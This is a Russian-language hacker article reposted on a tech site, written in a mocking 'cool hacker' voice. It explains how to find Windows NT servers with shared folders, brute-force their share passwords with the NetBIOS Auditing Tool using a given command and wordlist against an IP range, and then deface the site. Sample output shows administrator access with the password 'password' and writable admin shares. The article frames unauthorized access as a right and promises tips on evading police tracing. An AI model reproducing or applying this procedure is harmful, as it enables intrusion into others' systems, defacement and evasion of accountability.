Базы данныхИнтернетКомпьютерыОперационные системыПрограммированиеСетиСвязьРазное
Поиск по сайту:
Подпишись на рассылку:

Назад в раздел

О том, как взломать NT.

div.main {margin-left: 20pt; margin-right: 20pt}О том, как взломать NT.

Ну что перец, я знаю что ты хочешь, и сегодня я дам тебе это. Ты наверно давно мечтал о том, что так красиво сияет в далеке, о том, что манит и плянит, о том, что ты так ждешь и никак не достигнишь, это то, то ты можешь с гордостью сказать что ты - ХАКЕР. Но в жизни оказывается, что не все так просто, в жизни прихобится проходит через самые гнусные и тяжелые моменты. Так вот сегодня кулхацкер, мы с тобою посмеемся
опять над бедными МЕЛКОМЯГКИМИ, а точнее над их творением Windows NT. Как они утверждают, это самый надежная и рульная ОС для сетей. Но сегодня я опять опущу их, как люблю это делать. Сегодня ты увидишь рассказ о том, как МЕЛКОМЯГКИЕ
допускают ошибки. И я мечтаю, чтоб кто-нить из них прочел это, и понял какой он ламух, что никак не может написать нормальную ОС.

Ну теперь к делу. Начну я наверно с того, что отмечу самые главные аспекты взлома их системы:

1) довольно логичное повествование о том, как найти машину, на которой стоит Windows NT, и получить доступ к зашаренным ресурсам;
2) 2 пункт, поскольку я пишу статью о том, как взломать сервер NT, то я буду именно рассказывать о том, как "дефейсить" страницы этого сервера;
3)ПРАВО на жизнь!;

Ну что же перец, ты готов? если нет, то выруби комп, и иди спать, если все же да, то у тебя может возникнуть вопрос, а захер оно мне, ведь на данный момент даже у самих МЕЛКОМЯГКИХ стоят компы, на котрых поставлена ОС ЮНИХ (не все но есть), а отальные и подавно используют ЮНИХ. Так вот я тебе отвечу, что, во-первых есть такие ломухи, которые ставят NT, а даже если ты их не встретишь, то этот текст все-равно очень важен для тебя, поскольку постольку, разобравшись в чем тут дело, и сломав разок НТ, ты можешь с гордостью сказать "Я ВСТАЛ НА ПУТЬ ИСТИННЫЙ", то есть познав это ты твердо встанешь на ту дорогу, о который я те по ушам ездил в самом начале.

ТАК ВОТ: 1 пункт рассказа:

найти такие системы оказывается намного проще чем взломать их. Объясняю, на многих серваках есть дирректории, которые данные серваки разрешают аидеть другим, ну конечно не всем (хотя бывает и всем), это делается для того, чтобы например служащий, который щас на больничном, мог из своего дома получать информацию данного сервера.Ну а чем ты хуже того больного Простатитом :). Давай научимся получать доступ к файлам сервера. Так вот дерзай, беги в инет, и ищи проги, которые
ищут зашаренные диски(я не буду долго объяснять как и что и зачем, потому что тут уже есть статья об этом). Так вот, в итоге ты получил хуть какой-то доступ. Но тебе этого мало, потому что это было довольно несложно. Тогда ты ищешь ресурсы, к которым есть доступ но он с паролем, так вот как-раз это тебя и заинтересовывает, почему это какая-то свинья прячет от тебя пароль для получения инфы. Тебе сразу становится невтерпеж почитать эти файлы. Так вот тогда мы прибегнем к способу, который
потребует вмешательства програмыы под названием NAT (NetBIOS Auditing Tool). Что же она делает, она всего лишь навсего подключается к заданному тобой промежутку ип-адресов, и перебирает пароли к ресурсам, тем самым пытается полчучить для тебя полный доступ у ресурам сети. Так что это программа заслужила твоего внимания, и давай посмотрим на то, какие у нее есть функции:

NAT.EXE [-o filename] [-u userlist] [-p passlist]

ну как бы наверно все понятно, первый это тот файл в который онв звпишет свой отчет, второй пункт, это тот файл откуда она возьмет имена тех пользователей, которых будет перебирать, ну а третий пункт, это тот файл из которого будет брать пароли для подбора.
Словарик для этого дела можно найти легко в инете. На данный момент самый объемный словарь весит около 8 мегов.

Так вот теперь настал кульминационный момент:

пишем:

C:nat -o chto_ja_otimel.txt -u lamers.txt -p haha.txt 195.46.168.1-195.46.168.33.

ВПЕРЕД!! как сказал великий полководец. Теперь твое дело самое интелектуальное наверно из всех, которые сегодня надо будет сделать, это просто сидеть и наблюдать за тем, как эта программа взламывает пароли к зашаренным ресурсам.

Выглядеть это будет так:

-- Reading usernames from lamers.txt
-- Reading passwords from haha.txt
-- Checking host: 195.47.168.1
-- Obtaining list of remote NetBIOS names.
-- Attempting to connect with name: *
-- Unable to connect.
-- Attempting to connect with name: *SMBSERVER
-- CONNECTED with name: *SMBSERVER
-- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
-- Server time is Mon Dec 01 07:44:34 1997
-- Timezone is UTC-6.0
-- Remote server wants us to encrypt, telling it not to
-- Attempting to connect with name: *SMBSERVER
-- CONNECTED with name: *SMBSERVER
-- Attempting to establish session
-- Was not able to establish session with no password
-- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
-- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

ну что же теперь наступает самое интересное :) :
наша программулька начинает получать инфу:

-- Obtained server information:.

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[].
-- Obtained listing of shares:
Sharename Type Comment
ADMINISTRTOR$ Disk: Remote Admin
SHARE$ Disk: Default share
IPC$ IPC: Remote IPC
LOGON Disk: Logon server share
GUEST Disk: .



-- This machine has a browse list:

Server Comment
--------- -------
SERVER1

-- Attempting to access share: \*SMBSERVER -- Unable to access.

-- Attempting to access share: \*SMBSERVERADMINISTRATOR$ -- WARNING:
Able to access share: \*SMBSERVERADMINISTRATOR$ -- Checking write access in: \*SMBSERVERADMINISTRATOR$
-- WARNING: Directory is writeable: \*SMBSERVERADMIN$ -- Attempting to exercise .. bug on: \*SMBSERVERADMIN$ .

-- Attempting to access share: \*SMBSERVERSHARE$ -- WARNING: Able to access share: \*SMBSERVERSHARE$
-- Checking write access in: \*SMBSERVERSHARE$ -- WARNING: Directory is writeable: \*SMBSERVERSHARE$
-- Attempting to exercise .. bug on: \*SMBSERVERSHARE$.

-- Attempting to access share: \*SMBSERVERLOGON -- WARNING: Able to access share: \*SMBSERVERLOGON
-- Checking write access in: \*SMBSERVERLOGON -- Attempting to exercise .. bug on: \*SMBSERVERLOGON .

-- Attempting to access share: \*SMBSERVERGUEST -- WARNING: Able to access share: \*SMBSERVERGUEST
-- Checking write access in: \*SMBSERVERGUEST -- Attempting to exercise .. bug on: \*SMBSERVERGUEST .

Ну что кулхацкер, дальше получив доступ, разбрешься сам, тебе осталось только дефейсить их страничку, а точнее, написать фразу типа, "я мол кулхацкер взломал вас, а вы все ламо, учитесь защищятся". Так что осталась единственная проблема, это
как уйти от преследования ФСБ. Но с этим тебе поможет ][Leader][ справится. Жди новую статью, и я расскажу тебе о том, как сделать так, чтобы провайдер на запрос сервера о том по какому телефону к вам подключался такой-то, отвечал что мол
это был тот который живет тремя этажами ниже от тебя :).

И напоследок третий пункт моего рассказа: ну как ты уже это понял, что не каждый человек может иметь доступ к определенным файлам. Так вот хакер - это человек, который не любит этого, он не уважает тех, кто создал СИСТЕМУ. Он получает доступ к файлам, потому что для него это интересно, он познает мир. Ну например, почему обычный человек не может знать, например на какие счета положил деньги Ельцин. КАЖДЫЙ ИЗ НАС ИМЕЕТ ПРАВО НА СВОБОДУ ЗНАНИЙ.

Автор: ][Leader][



  • Главная
  • Новости
  • Новинки
  • Скрипты
  • Форум
  • Ссылки
  • О сайте




  • Emanual.ru – это сайт, посвящённый всем значимым событиям в IT-индустрии: новейшие разработки, уникальные методы и горячие новости! Тонны информации, полезной как для обычных пользователей, так и для самых продвинутых программистов! Интересные обсуждения на актуальные темы и огромная аудитория, которая может быть интересна широкому кругу рекламодателей. У нас вы узнаете всё о компьютерах, базах данных, операционных системах, сетях, инфраструктурах, связях и программированию на популярных языках!
     Copyright © 2001-2024
    Реклама на сайте